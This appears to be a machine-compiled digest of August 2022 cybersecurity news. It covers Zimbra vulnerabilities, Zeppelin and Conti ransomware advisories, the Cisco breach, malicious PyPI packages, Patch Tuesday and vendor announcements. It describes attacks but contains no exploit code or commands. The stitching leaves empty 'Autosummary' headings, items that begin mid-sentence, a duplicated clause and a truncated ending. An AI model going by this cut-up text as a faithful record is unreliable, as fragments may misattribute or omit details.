A Metasploit module is also available that creates a RAR file that can be emailed to a ZCS server to exploit CVE-2022-30333.[10] CVE-2022-24682 CVE-2022-24682 is a medium-severity vulnerability that impacts ZCS webmail clients running releases before 8.8.15 patch 30 (update 1), which contain a cross-site scripting (XSS) vulnerability allowing malicious actors to steal session cookie files. The Cybersecurity and Infrastructure Security Agency ( CISA ) and the Multi-State Information Sharing & Analysis Center ( MS-ISAC ) are publishing this joint Cybersecurity Advisory (CSA) in response to active exploitation of multiple Common Vulnerabilities and Exposures (CVEs) against Zimbra Collaboration Suite (ZCS), an enterprise cloud-hosted collaboration software and email platform. "Autosummary:
The breached data, published online after ransom negotiations between Clop and its victim broke down, also includes passports, screenshots from water-treatment SCADA systems, driver’s licenses and more, the report said. "Autosummary:
Few lines of defense Johannes Ullrich, Dean of Research at SANS says that a remote attacker could exploit the vulnerability for the following actions: crash the device execute arbitrary code establish backdoors for persistence reroute network traffic intercept network traffic Ullrich warns that if an exploit for CVE-2022-27255 turns into a worm, it could spread over the internet in minutes. "Categories: News Categories: Ransomware Tags: Zeppelin Tags: ransomware Tags: RDP Tags: Sonicwall Tags: phishing Tags: malvertising Tags: backups Tags: authentication Tags: mfa Tags: patching Tags: EDR The FBI and CISA have issued a joint Cybersecurity Advisory (CSA) to raise awareness about Zeppelin ransomware |
The post CISA and FBI issue alert about Zeppelin ransomware appeared first on Malwarebytes Labs.
"Autosummary:
Backups Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud). While anyone can fall victim to these threat actors, the FBI noted that this malware has been used to target a wide range of businesses and critical infrastructure organizations, including defense contractors, educational institutions, manufacturers, technology companies, and especially organizations in the healthcare and medical industries.Posted: August 16, 2022 by The FBI and CISA have issued a joint Cybersecurity Advisory (CSA) to raise awareness about Zeppelin ransomware The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have released a joint Cybersecurity Advisory (CSA) about Zeppelin ransomware. "Quick Heal Technologies has collaborated with RevBits to address the protection need for an on-premise infrastructure of government organisations. The partnership will help Quick Heal enhance its Seqrite product portfolio while enabling RevBits to expand its market presence in India. The association also aims to help government organizations that prefer to run their critical systems on-premise rather than in the cloud, thereby ensuring that they operate safely and seamlessly without the fear of cyberattacks. Dr. … More
The post Quick Heal collaborates with RevBits to strengthen its cybersecurity portfolio appeared first on Help Net Security.
"Autosummary:
"IRONSCALES has partnered with Distology, to expand the distribution of email and messaging platform cybersecurity solutions to organizations throughout the UK and EMEA. “As business networks of all sizes are becoming increasingly distributed across cloud services, cybersecurity concerns continue to rise. Security teams are struggling with phishing attacks slipping through existing technology and are lacking awareness training to adequately equip employees. IRONSCALES integrated email security and security awareness training solution is needed now more than … More
The post IRONSCALES partners with Distology to protect organizations from phishing attacks appeared first on Help Net Security.
"Autosummary:
"Enterprises are investing more in cybersecurity than ever before, but we’re also seeing a record number of breaches. More than 5.1 billion pieces of personal information were reported stolen last year, and the average cost of a breach has climbed to $4.35 million. Have the threat actors really become that good? Or is this a business failing? It can’t be denied that cyber criminals have become more organized, and more advanced tools and tactics are … More
The post Why it’s past time we operationalized cybersecurity appeared first on Help Net Security.
"Autosummary:
This isn’t a single measurement, but rather applies to each of those core foundations – culture, accountability, processes, resources, automation, and measurement. Bringing cybersecurity in line with business metrics The first step toward operationalizing cybersecurity is to start thinking of it just like any other business investment. Tying security to core business foundations Every business needs to deliver on several core foundations to be successful. "Abnormal Security released a which report explores the current email threat landscape and provides insight into the latest advanced email attack trends, including increases in business email compromise, the evolution of financial supply chain compromise and the rise of brand impersonation in credential phishing attacks. The research found a 48% increase in email attacks over the previous six months, and 68.5% of those attacks included a credential phishing link. In addition to posing as internal … More
The post Credential phishing attacks skyrocketing, 265 brands impersonated in H1 2022 appeared first on Help Net Security.
"Autosummary:
Abnormal Security released a which report explores the current email threat landscape and provides insight into the latest advanced email attack trends, including increases in business email compromise, the evolution of financial supply chain compromise and the rise of brand impersonation in credential phishing attacks. "In Q2 2022, Kroll observed a 90% increase in the number of healthcare organizations targeted in comparison with Q1 2022, dropping the final nail in the coffin for the “truce” some criminal groups instituted earlier in the COVID-19 pandemic. Ransomware helped to fuel this uptick against healthcare as attacks increased this quarter to once again became the top threat, followed closely by email compromise. While phishing continued to be the vector used for initial access, … More
The post Ransomware is back, healthcare sector most targeted appeared first on Help Net Security.
"Autosummary:
"Security Researchers discovered a new PyPI Package designed to drop fileless cryptominer to Linux systems. Sonatype researchers have discovered a new PyPI package named ‘secretslib‘ that drops fileless cryptominer to the memory of Linux machine systems. The package describes itself as “secrets matching and verification made easy,” it has a total of 93 downloads since […]
The post A new PyPI Package was found delivering fileless Linux Malware appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
Cape Verde domains are used by many phishing actors (Agari) As discussed in a late last year report by Palo Alto Networks, phishing actors use domains from small island countries, in this case, Cape Verde, due to their lax anti-abuse regulations that help them generate national income. "Security researchers from Cleafy reported that the SOVA Android banking malware is back and is rapidly evolving. The SOVA Android banking trojan was improved, it has a new ransomware feature that encrypts files on Android devices, Cleafy researchers report. The malware has been active since 2021 and evolves over time. The latest version of the […]
The post SOVA Android malware now also encrypts victims’ files appeared first on Security Affairs.
"Autosummary:
These features, combined with Accessibility services, enable TAs to perform gestures and, consequently, fraudulent activities from the infected device, as we have already seen in other Android Banking Trojans (e.g. Oscorp or BRATA).” "Microsoft disrupted a hacking operation linked conducted by Russia-linked APT SEABORGIUM aimed at NATO countries. The Microsoft Threat Intelligence Center (MSTIC) has disrupted activity by SEABORGIUM (aka ColdRiver, TA446), a Russia-linked threat actor that is behind a persistent hacking campaign targeting people and organizations in NATO countries. SEABORGIUM has been active since at least 2017, […]
The post Microsoft disrupts SEABORGIUM ’s ongoing phishing operations appeared first on Security Affairs.
"Autosummary:
Microsoft has disrupted activity by SEABORGIUM, a Russia-based actor launching persistent phishing, credential and data theft, intrusions, and hack-and-leak campaigns tied to espionage. "Categories: Business We’re excited to announce Malwarebytes Cloud Storage Scanning, a new service which extends Nebula malware scanning options to include files stored on cloud storage repositories that are part of your organization’s digital ecosystem. |
The post Introducing Malwarebytes Cloud Storage Scanning: How to scan for malware in cloud file storage repositories appeared first on Malwarebytes Labs.
"Autosummary:
An additional layer of security While integrated cloud malware detection solutions (e.g. BoxShield for Box.com; MS Defender for OneDrive) can be useful, many businesses use multiple different cloud storage repositories, and due to lack of integration options, are unable to get a centralized view of all of their scan results, across multiple repositories, in a single security-focused pane of glass. Scanning for cloud malware In Nebula, go to “Settings” and click “Cloud Storage Scans”. "The US Cybersecurity and Infrastructure Security Agency (CISA) and the FBI are warning of Zeppelin ransomware attacks. The US Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have published a joint advisory to warn of Zeppelin ransomware attacks. The Zeppelin ransomware first appeared on the threat landscape in November 2019 […]
The post CISA, FBI shared a joint advisory to warn of Zeppelin ransomware attacks appeared first on Security Affairs.
"Autosummary:
To mitigate the risks of ransomware attacks, organizations are recommended to define a recovery plan, implement multi-factor authentication, keep all operating systems, software, and firmware up to date, enforce a strong passwords policy, segment networks, disable unused ports and services, audit user accounts and domain controllers, implement a least-privilege access policy, review domain controllers, servers, workstations, and active directories, maintain offline backups of data, and identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. "Microsoft"s August Patch Tuesday release addresses 123 security issues in Microsoft Windows, Office, Exchange (it"s back!) and Visual Studio — and unfortunately, we have two zero-days with reports of active exploitation in the wild. Since this is a broad update, it will require planning and testing before deployment.
The first (CVE-2022-34713) occurs in the Windows diagnostic tools and the second (CVE-2022-30134) affects Microsoft Exchange. Basically, the holidays are over and it"s time to pay attention to Microsoft updates again. We have made "Patch Now" recommendations for Windows, Exchange and Adobe for this month.
Autosummary:
Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange; Microsoft Development platforms ( ASP.NET Core, .NETYou will not find these latest updates in the Microsoft catalog, so I have included a list of updates available for the following specific builds of Exchange Server: Exchange Server 2013 CU23 Exchange Server 2016 CU22 and CU23 Exchange Server 2019 CU11 and CU12 Given the publicly disclosed vulnerability in Microsoft Exchange (CVE-2022-30134) which allows an attacker to read targeted email messages, Microsoft has recommended you apply these security related fixes immediately (italics added by Microsoft). Key testing scenarios Given the large number of changes included in this August patch cycle, I have broken down the testing scenarios into high risk and standard risk groups: High Risk: These are likely to include functionality changes, may deprecate existing functionality and will likely require creating new testing plans: Service Stack Update: There is a significant change to the Microsoft Servicing Stack ( SSU ).Microsoft explains, "When you start Outlook Desktop, it gets past loading profile and processing, briefly opens, and then stops responding," Microsoft is currently working on the issue and we expect an update soon. Microsoft Office Microsoft released an out-of-band (OOB) patch (KB5002248) for Microsoft Office 2016 (both 32- and 64-bit) relating to VBA projects and Microsoft Access. Major revisions Though we have fewer "new" patches released this month, there are a lot of updated and newly released patches from previous months: CVE-2022-26832 : NET Framework Denial of Service Vulnerability. Given the changes to the SSU, Windows Boot Manager and updates to the Windows kernel (WIN32KY.SYS) this month, it may be worth having a look at some Microsoft testing platforms such as the Microsoft Test Authoring and Execution Framework (TAEF). "Autosummary:
Moreover, it features refactored and improved code that helps it operate more stealthy on the compromised device, while its latest version, 5.0, adds a ransomware module. "Avast released a report revealing a significant increase in global ransomware attacks, up 24% from Q1/2022. Researchers also uncovered a new zero-day exploit in Chrome, as well as signals how cybercriminals are preparing to move away from macros as an infection vector. Ransomware attacks increase After months of decline, global ransomware attacks increased significantly in Q2/2022, up 24% from the previous quarter. The highest quarter-on-quarter increases in ransomware risk ratio occurred in Argentina (+56%), UK … More
The post Ransomware is not going anywhere: Attacks are up 24% appeared first on Help Net Security.
"Autosummary:
The highest quarter-on-quarter increases in ransomware risk ratio occurred in Argentina (+56%), UK (+55%), Brazil (+50%), France (+42%), and India (+37%). "Businesses are increasingly concerned about how they will meet ransomware demands. Only 19 percent of those surveyed have ransomware coverage limits above $600,000, while over half (59 percent) hoped the government would cover damages when future attacks are linked to other nation-states, according to BlackBerry Limited and Corvus Insurance. SMBs, who have become a favorite criminal target, are especially feeling the heat. Of businesses with under 1,500 employees, only 14 percent have a coverage limit … More
The post Organizations would like the government to help with ransomware demand costs appeared first on Help Net Security.
"Autosummary:
Only 19 percent of those surveyed have ransomware coverage limits above $600,000, while over half (59 percent) hoped the government would cover damages when future attacks are linked to other nation-states, according to BlackBerry Limited and Corvus Insurance. "Network professionals feel confident with their security and compliance practices but data suggests that they also leave their organizations open to risk, which is costing a significant amount of revenue, according to Titania. In addition, some businesses are not minimizing their attack surface effectively. Companies are prioritizing firewall security and chronicle a fast time to respond to misconfigurations when detected in annual audits. However, switches and routers are only included in 4% of audits and … More
The post The impact of exploitable misconfigurations on network security appeared first on Help Net Security.
"Autosummary:
Specifically, the study, which surveyed 160 senior cybersecurity decision-makers across the U.S. Military, Federal Government, Oil and Gas, Telecoms, and Financial Services sectors, revealed: Misconfigurations cost organizations millions Organizations stated that misconfigurations cost an average of 9% of their annual revenue but the true cost is likely to be higher. "According to a new Tessian report, 30% employees do not think they personally play a role in maintaining their company’s cybersecurity posture. This Help Net Security video reveals why strong security culture is important in maintaining a strong security posture.
The post 25% of employees don’t care enough about cybersecurity to report a security incident appeared first on Help Net Security.
"Autosummary:
"In this Help Net Security video, Ax Sharma, Senior Security Researcher at Sonatype, discusses newly found PyPI packages that pack ransomware, and another package that appears to be safe but silently drops fileless malware to mine cryptocurrency (Monero) on the infected system – all while evading detection.
The post Malicious PyPI packages drop ransomware, fileless malware appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Initially, 7-Eleven’s Danish division did not say that ransomware was responsible for its problems, simply describing the incident as a “hacker attack”: “We suspect that we have been the victim of a hacker attack today. "Autosummary:
"Autosummary:
"Threat actors are exploiting an authentication bypass Zimbra flaw, tracked as CVE-2022-27925, to hack Zimbra Collaboration Suite email servers worldwide. An authentication bypass affecting Zimbra Collaboration Suite, tracked as CVE-2022-27925, is actively exploited to hack ZCS email servers worldwide. Zimbra is an email and collaboration platform used by more than 200,000 businesses from over 140 countries. Yesterday, August 11, CISA has […]
The post Experts warn of mass exploitation of an RCE flaw in Zimbra Collaboration Suite appeared first on Security Affairs.
"Autosummary:
The countries with the most compromised instances include the U.S., Italy, Germany, France, India, Russia, Indonesia, Switzerland, Spain, and Poland.The two issues are: CVE-2022-27925 (CVSS score: 7.2) – Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability: Zimbra Collaboration (ZCS) contains flaw in the mboximport functionality, allowing an authenticated attacker to upload arbitrary files to perform remote code execution. "The Conti ransomware gang is using BazarCall phishing attacks as an initial attack vector to access targeted networks. BazarCall attack, aka call back phishing, is an attack vector that utilizes targeted phishing methodology and was first used by the Ryuk ransomware gang in 2020/2021. The BazarCall attack chain is composed of the following stages: Stage […]
The post BazarCall attacks have revolutionized ransomware operations appeared first on Security Affairs.
"Autosummary:
The adoption of Callback phishing campaigns has impacted the strategy of ransomware gangs, experts observed targeted attacks aimed at Finance, Technology, Legal, and Insurance industries. It involved large investments into hiring spammers, OSINT specialists, designers, call center operators, and expanding the number of network intruders. "Autosummary:
PAN-OS prior to 10.1.6-h6 (patch available) PAN-OS prior to 10.0.11-h1 (patch ETA: next week) PAN-OS prior to 9.1.14-h4 (patch ETA: next week) PAN-OS prior to 9.0.16-h3 (patch ETA: next week) "Autosummary:
" Also targeting Zoho and Exchange servers APT27 (aka Emissary Panda, Iron Tiger, and LuckyMouse) is a Chinese-backed threat group active for over a decade (since at least 2010) and known for its focus on cyber espionage and information theft campaigns. "Autosummary:
"Autosummary:
Multiple Encryption Once Zeppelin ransomware is executed on a network, each encrypted file is appended with a randomized nine-digit hexadecimal number as a file extension, e.g., file.txt.txt.C59-E0C-929, according to the CISA. "The U.S. State Department announced a $10 million reward for information related to five individuals associated with the Conti ransomware gang. The U.S. State Department announced a $10 million reward for information on five prominent members of the Conti ransomware gang. The government will also reward people that will provide details about Conti and its affiliated groups TrickBot and Wizard […]
The post The US offers a $10M rewards for info on the Conti ransomware gang’s members appeared first on Security Affairs.
"Autosummary:
“That photo is the first time the US government has ever identified a malicious actor associated with Conti,” The other members of the Conti gang for which the US Government is offering a reward are referred to as “Tramp,” “Dandis,” “Professor,” and “Reshaev.” "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @demonslay335, @Ionut_Ilascu, @PolarToffee, @malwareforme, @LawrenceAbrams, @DanielGallagher, @VK_Intel, @fwosar, @struppigel, @Seifreed, @BleepinComputer, @billtoulas, @serghei, @malwrhunterteam, @FourOctets, @jorntvdw, @fiskerlarsen, @Sophos, @y_advintel, @AdvIntel, @Cyberknow20, @kaspersky, @PaloAltoNtwks, @AhnLab_SecuInfo, @ReversingLabs, @pcrisk, @Amigo_A_, @jamiemaccol, @Jarnecki, and @PogoWasRight. Finally, the US government published a picture of a Conti ransomware member for the first, asking people to provide info on members named "Target," "Tramp," "Dandis," "Professor," and "Reshaev." "The NHS was victim of a potential cyberattack, which raises the question of the impact of those data breach for the public.
The post The potential consequences of data breach, and romance scams – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"Categories: Exploits and vulnerabilities Categories: News Tags: Discord Tags: Spotify Tags: MicrosoftTeams Tags: Electron Tags: ElectronJS Tags: NodeJS Tags: V8 Chrome Tags: Log4Shell Tags: Log4j A group of security researchers found a series of vulnerabilities in the software underlying popular apps like Discord, Microsoft Teams, and many others |
The post Researchers found one-click exploits in Discord and Teams appeared first on Malwarebytes Labs.
"Autosummary:
Posted: August 12, 2022 by A group of security researchers found a series of vulnerabilities in the software underlying popular apps like Discord, Microsoft Teams, Spotify and many others A group of security researchers have discovered a series of vulnerabilities in Electron, the software underlying popular apps like Discord, Microsoft Teams, and many others, used by tens of millions of people all over the world. "In this Help Net Security video, Security Consultant Kam Talebzadeh and Senior Security Researcher Nevada Romsdahl from Secureworks, showcase SquarePhish, a tool that combines QR codes and OAuth 2.0 device code flow for advanced phishing attacks. SquarePhish is available for download on GitHub. If you’re at Black Hat USA 2022, you can learn more about SquarePhish. The authors will be at the Arsenal, doing demos and answering questions on Thursday, August 11, starting at 2.30PM.
The post SquarePhish: Advanced phishing tool combines QR codes and OAuth 2.0 device code flow appeared first on Help Net Security.
"Autosummary:
"SAP’s status as a leading business process management software provider is undeniable. Today, the company serves over 230 million cloud users and 99 of the top 100 companies in the world with the largest cloud portfolio of any provider, comprising more than 100 solutions covering all business functions. Touching 77% of all transactions and thought to store 70% of all corporate data, SAP systems are a fundamental digital cog in the global economy. But SAP … More
The post Why SAP systems need to be brought into the cybersecurity fold appeared first on Help Net Security.
"Autosummary:
By converging SIEM solutions with Security Orchestration, Automation and Response (SOAR) and User and entity behavior analytics (UEBA), organizations can benefit from automated threat detection, investigation, and response capabilities as well as accurate, risk-based analytics, guiding security teams to combat advanced threats.SAP SCM, for example, is built to support supply chain management specialists with solutions in planning, logistics, manufacturing, and product lifecycle management. In meeting the unique requirements of individual departments, these applications can end up siloed in small pockets of the organization away from central security strategies, making it difficult to monitor, patch and maintain them, let alone spot suspicious or malicious activity. "ActZero has launched a Ransomware Readiness Assessment for small and medium-sized enterprises (SMEs). The program simulates a ransomware attack sequence, which can expose vulnerabilities and lateral pathways left open by existing tools. With this valuable visibility businesses can start reducing risk immediately. Adversaries expect small businesses to lack proper ransomware defenses. With ActZero MDR, they can now prove them wrong. Adversaries are turning up the pressure on their victims, demanding average ransoms nearing $1M, and … More
The post ActZero Ransomware Readiness Assessment strenghtens ransomware defense for SMEs appeared first on Help Net Security.
"Autosummary:
Over the past few months of assessment activity, ActZero has discovered that, on average, its MDR service was able to detect and block 89% of all common and recent ransomware events techniques and tactics, including emerging threats. "IRONSCALES has launched the addition of new advanced Security Awareness Training to help customers better educate their employees on how to spot phishing attacks, improve their overall security knowledge, and learn about multiple industry compliance framework requirements. With this launch, IRONSCALES’ Complete Protect plan customers will gain exclusive access to over a hundred new training videos in nine languages from IRONSCALES’ partner Wizer Training. This new addition streamlines the ability for customers to launch Security … More
The post IRONSCALES Security Awareness Training educates users about phishing attacks appeared first on Help Net Security.
"Autosummary:
"A wave of cybercriminals spreading malware families – including QakBot, IceID, Emotet, and RedLine Stealer – are shifting to shortcut (LNK) files for email malware delivery. Shortcuts are replacing Office macros – which are starting to be blocked by default in Office – as a way for attackers to get a foothold within networks by tricking users into infecting their PCs with malware. Keeping up with changes in the email threat landscape HP Wolf Security’s … More
The post Which malware delivery techniques are currently favored by attackers? appeared first on Help Net Security.
"Autosummary:
Further key findings in the report include: 14% of email malware captured by HP Wolf Security bypassed at least one email gateway scanner Threat actors used 593 different malware families in their attempts to infect organizations, compared to 545 in the previous quarter Spreadsheets remained the top malicious file type , but the threat research team saw an 11% rise in archive threats – suggesting attackers are increasingly placing files in archive files before sending them in order to evade detection , but the threat research team saw an 11% rise in archive threats – suggesting attackers are increasingly placing files in archive files before sending them in order to evade detection 69% of malware detected was delivered via email, while web downloads were responsible for 17% The most common phishing lures were business transactions such as “Order”, “Payment”, “Purchase”, “Request” and “Invoice” “Attackers are testing new malicious file formats or exploits at pace to bypass detection, so organizations must prepare for the unexpected. "A former Twitter employee was found guilty of spying on certain Twitter users for Saudi Arabia. A former Twitter employee, Ahmad Abouammo (44), was found guilty of gathering private information of certain Twitter users and passing them to Saudi Arabia. “Ahmad Abouammo, a US resident born in Egypt, was found guilty by a jury Tuesday […]
The post Ex Twitter employee found guilty of spying for Saudi Arabian government appeared first on Security Affairs.
"Autosummary:
Abouammo and Alzabarah had unauthorized access to information associated with some profiles, including email addresses, devices used, user-provided biographical information, birth dates, logs that contained the user’s browser information, a log of all of a particular user’s actions on the Twitter platform at any given time, and other info that can be used to geo-locate a user such as IP addresses and phone numbers. "Autosummary:
"Cuba ransomware is distributed through Hancitor malware, a loader known for dropping or executing stealers, such as Remote Access Trojans (RATs) and other types of ransomware, onto victims" networks," according to a December 2021 alert from the U.S. Federal Bureau of Investigation (FBI)." In the intervening months, the ransomware operation has received an upgrade with an aim to "optimize its execution, minimize unintended system behavior, and provide technical support to the ransomware victims if they choose to negotiate," per Trend Micro. "Autosummary:
"Autosummary:
"Actions to take today to mitigate cyber threats from ransomware:
• Prioritize remediating known exploited vulnerabilities.
• Train users to recognize and report phishing attempts.
• Enable and enforce multifactor authentication.
Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Zeppelin ransomware IOCs and TTPs associated with ransomware variants identified through FBI investigations as recently as 21 June 2022.
The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Download the PDF version of this report: pdf, 999 kb
Download the YARA signature for Zeppelin: YARA Signature, .yar 125 kb
Note: this advisory uses the MITRE ATT&CK® for Enterprise framework, version 11. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.
Zep "
Autosummary:
Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.125 kb Mitigations The FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Zeppelin ransomware: Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).REPORTING The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Zeppelin actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.From 2019 through at least June 2022, actors have used this malware to target a wide range of businesses and critical infrastructure organizations, including defense contractors, educational institutions, manufacturers, technology companies, and especially organizations in the healthcare and medical industries. to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).Once the ransomware is executed, a randomized nine-digit hexadecimal number is appended to each encrypted file as a file extension, e.g., file.txt.txt.C59-E0C-929 [T1486]. with password logins (e.g., service account, admin accounts, and domain admin accounts) with National Institute for Standards and Technology (NIST) standards for developing and managing password policies. "Autosummary:
"U.S. networking giant Cisco Systems has been hacked, the company confirmed on Wednesday, after Yanluowang ransomware operators claimed the attack on their leak site. #Yanluowang #ransomware is claiming to have breached #Cisco ! Without any further information, the group released a list of 8110 lines,showing folder names and possibly exfiltrated files.The word #Cisco only appears 94 times. More information in the screenshots below: pic.twitter.com/2c5shCSbF9 — Gitworm (@Gi7w0rm) August 10, 2022 But according to Cisco’s Talos … More
The post Cisco has been hacked by a ransomware gang appeared first on Help Net Security.
"Autosummary:
The attackers then: Escalated their privileges to “admin”, allowing them to log in to various systems (and this is when Cisco Security’s IT team noticed something was amiss) Dropped remote access and offensive security tools Added backdoor accounts and persistence mechanisms “Following initial access to the environment, the threat actor conducted a variety of activities for the purposes of maintaining access, minimizing forensic artifacts, and increasing their level of access to systems within the environment,” the team explained. "Autosummary:
Furthermore, the actor is said to have deployed a variety of tools, including remote access utilities like LogMeIn and TeamViewer, offensive security tools such as Cobalt Strike, PowerSploit, Mimikatz, and Impacket aimed at increasing their level of access to systems within the network. "Autosummary:
However, as Volexity warns, if vulnerable servers haven"t been patched against the RCE bug (CVE-2022-27925) before the end of May 2022, "you should consider your ZCS instance may be compromised (and thus all data on it, including email content, may be stolen) and perform a full analysis of the server. "Autosummary:
" "As threat actors have realized the potentialities of weaponized social engineering tactics, it is likely that these phishing operations will only continue to become more elaborate, detailed, and difficult to parse from legitimate communications as time goes on," the researchers said. "Autosummary:
U.S. govt reveals the first face of a Conti member Today, for the first time, the State Department revealed the face of a known Conti ransomware operator known as "Target," offering rewards of up to $10 million for information on him and four other members known as "Tramp," "Dandis," "Professor," and "Reshaev." After rebranding from Ryuk to Conti in the summer of 2020, the ransomware gang quickly rose in prominence as they attacked high-profile victims, including City of Tulsa, Broward County Public Schools, Advantech, and Ireland"s Health Service Executive (HSE) and Department of Health (DoH). "Categories: Personal The new school season is just around the corner. And while you are getting ready to go back to school, now is a good opportunity to check you are doing all you can to stay as safe as possible online. |
The post 5 cybersecurity tips for students going back to school appeared first on Malwarebytes Labs.
"Autosummary:
It"s on social media, SMS, chat platforms, gaming platforms, and other online watering holes, too. 5. Lock down your files The school does its part to secure your most important data, but you have a part to play, too. "Vicarius announced at the Black Hat USA 2022 conference the release of vsociety, a social community for security professionals that aims to enable peer-to-peer networking and open-source collaboration on vulnerability research. In the short time since its inception, the vsociety community has proven itself as a valuable research hub, with multiple pieces of original research published exclusively to the cybersecurity social network. Among them, a new proof-of-concept exploit targeting Google SLO-Generator, posted by anonymous user … More
The post Vicarius vsociety enables peer-to-peer networking and open-source collaboration on vulnerability research appeared first on Help Net Security.
"Autosummary:
“Knowledge sharing is critical to ensure growth of the Infosec community, and with vsociety’s community model and intuitive design, it is the best place to publish original research,” said ‘M’, researcher. "Cymulate announced the expansion of its Extended Security Posture Management (XSPM) Platform to include advanced insights and analytics capabilities. As businesses struggle to manage attack surfaces and validate security controls, these new data-driven capabilities significantly improve risk visibility and deliver actionable insights for reducing remediation time. Businesses also now gain enhanced levels of granularity for setting and tracking cybersecurity performance metrics and KPIs, which are required for improving cyber resilience. “Now, more than ever, organizations … More
The post Cymulate improves risk visibility for businesses with new analytics capabilities appeared first on Help Net Security.
"Autosummary:
"At Black Hat USA 2022, SecurityScorecard announced the integration of its Professional Services offering with its ratings platform to provide a single point of orchestration to manage cybersecurity risks. SecurityScorecard’s Professional Services team can help any customer manage cybersecurity risk in concert with the industry’s largest and most comprehensive global, cyber risk data set, setting the industry standard for how cyber risk is quantified, measured and reduced. SecurityScorecard delivers strategic, proactive and acute-scenario services paired … More
The post SecurityScorecard provides a combination of services and platform to help CISOs manage cybersecurity risks appeared first on Help Net Security.
"Autosummary:
“CISOs are under pressure to protect their organizations, and are now accountable to the Board of Directors, but they lack a single-point of orchestration for cybersecurity workflow and to define success,” said Aleksandr Yampolskiy, co-founder and CEO, SecurityScorecard. "Autosummary:
"Autosummary:
The security update further remediates multiple remote code execution flaws in Windows Point-to-Point Protocol (PPP), Windows Secure Socket Tunneling Protocol (SSTP), Azure RTOS GUIX Studio, Microsoft Office, and Windows Hyper-V. The Patch Tuesday fix is also notable for addressing dozens of privilege escalation flaws: 31 in Azure Site Recovery, a month after Microsoft squashed 30 similar bugs in the business continuity service, five in Storage Spaces Direct, three in Windows Kernel, and two in the Print Spooler module. "VMware warns of the availability of a proof-of-concept exploit code for a critical authentication bypass flaw in multiple products. VMware warns its customers of the availability of a proof-of-concept exploit code for a critical authentication bypass flaw, tracked as CVE-2022-31656, in multiple products. The flaw was discovered by security researcher Petrus Viet from VNG Security, […]
The post VMware warns of public PoC code for critical auth bypass bug CVE-2022-31656 appeared first on Security Affairs.
"Autosummary:
VMware warns its customers of the availability of a proof-of-concept exploit code for a critical authentication bypass flaw, tracked as CVE-2022-31656, in multiple products. "OPSWAT announced new malware analysis capabilities for IT and OT at the Black Hat USA 2022 conference. These enhancements include OPSWAT Sandbox for OT with detection of malicious communications on OT network protocols and support for open-source third-party tools in its MetaDefender Malware Analyzer solution. With increased threats and growing concerns around propagation into OT networks within critical infrastructure environments, threat intelligence for both the IT and OT sides of the business is essential in … More
The post OPSWAT’s malware analysis capabilities protect ICS/OT environments against cyber threats appeared first on Help Net Security.
"Autosummary:
"Autosummary:
It’s almost triple the size of last year’s August release, and it’s the second largest release this year,” wrote Dustin Childs, Zero Day Initiative manager, in a Tuesday blog post. In related news, Adobe patched 25 CVEs on Tuesday tackling bugs in Adobe Acrobat and Reader, Commerce, Illustrator, FrameMaker and Adobe Premier Elements. "US Critical Infrastructure Security Agency (CISA) adds vulnerabilities in the UnRAR utility to its Known Exploited Vulnerabilities Catalog. The Cybersecurity & Infrastructure Security Agency (CISA) has added a recently disclosed security flaw, tracked as CVE-2022-30333 (CVSS score: 7.5), in the UnRAR utility to its Known Exploited Vulnerabilities Catalog. The CVE-2022-30333 flaw is a path traversal […]
The post CISA adds UnRAR and Windows flaws to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Landing page for Kraken phishing (Netskope) Targeting wallets and services The phishing campaign is currently attempting to steal MetaMask wallets and credentials for crypto exchanges, such as CoinBase, Kraken, and Gemini. "Microsoft has confirmed that a high-severity, zero-day security vulnerability is actively being exploited by threat actors and is advising all Windows and Windows Server users to apply its latest monthly Patch Tuesday update as soon as possible.
The vulnerability, known as CVE-2022-34713 or DogWalk, allows attackers to exploit a weakness in the Windows Microsoft Support Diagnostic Tool (MSDT). By using social engineering or phishing, attackers can trick users into visiting a fake website or opening a malicious document or file and ultimately gain remote code execution on compromised systems.
Autosummary:
"Today, at Black Hat USA 2022, Deepfence announced the 1.4 release of its open source project ThreatMapper, cloud native offering that expands attack path visualization, adds cloud security posture management, and now includes the cloud native, YARA-based malware scanner. ThreatMapper is an open platform for scanning, mapping, and ranking vulnerabilities in running pods, images, hosts, and repositories. ThreatMapper scans for known and unknown vulnerabilities, secrets, cloud misconfigurations and then puts those findings in context. With … More
The post Deepfence ThreatMapper 1.4 empowers organizations to visualize cloud native threat landscape appeared first on Help Net Security.
